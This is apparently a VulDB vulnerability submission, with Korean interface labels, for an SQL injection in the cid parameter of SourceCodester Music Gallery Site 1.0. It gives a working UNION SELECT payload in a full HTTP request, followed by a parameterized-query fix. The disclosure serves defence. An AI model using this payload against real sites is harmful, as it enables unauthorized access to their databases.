| 제목 | SOURCECODESTER Music Gallery Site 1.0 / music_list.php cid SQL Injection |
|---|
| 설명 | Music Gallery Site: Any remote hacker can access the php-music/?page=music_list&cid=* from this URL and inject the SQL Injection malicious code on cid parameter which is available in GET request.
Vendor Homepage:
https://www.sourcecodester.com
Software Link:
https://www.sourcecodester.com/php/16073/music-gallery-site-using-php-and-mysql-database-free-source-code.html
Version:
v 1.0
Affected Page:
music_list.php
- On this page cid parameter is vulnerable to SQL Injection Attack
- URL of the vulnerable parameter is: php-music/?page=music_list&cid=*
Description:
- The Music Gallery site does have public pages for music library, on music list there is an SQL injection to filter out the music list with category basis.
Proof of Concept:
Following steps are involved:
1. Go to the category menu and click on view category.
2. In URL, there is a parameter 'cid' which is vulnerable to SQL injection (php-music/?page=music_list&cid=5*)
Request:
GET /php-music/?page=music_list&cid=5%27+and+false+union+select+1,version(),database(),4,5,6,7--+- HTTP/1.1
Host: localhost
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Response:
Any remote attacker can access full system through SQL Injection
Recommendation:
Whoever uses this CMS, should update the code of the application in to parameterized queries to avoid SQL Injection attack:
Example Code:
$sql = $obj_admin->db->prepare("SELECT * FROM `category_list` where `id` = :id and `delete_flag` = 0 and `status` = 1");
$sql->bindparam(':id', $cid);
$sql->execute();
$row = $sql->fetch(PDO::FETCH_ASSOC); |
|---|
| 원천 | ⚠️ https://github.com/navaidzansari/CVE_Demo/blob/main/2023/Music%20Gallery%20Site%20-%20SQL%20Injection%201.md |
|---|
| 사용자 | navaidansari (UID 41266) |
|---|
| 제출 | 2023. 02. 21. AM 10:24 (3 연령 ago) |
|---|
| 모더레이션 | 2023. 02. 21. AM 10:29 (4 minutes later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 221553 [SourceCodester Music Gallery Site 1.0 GET Request music_list.php cid SQL 주입] |
|---|
| 포인트들 | 20 |
|---|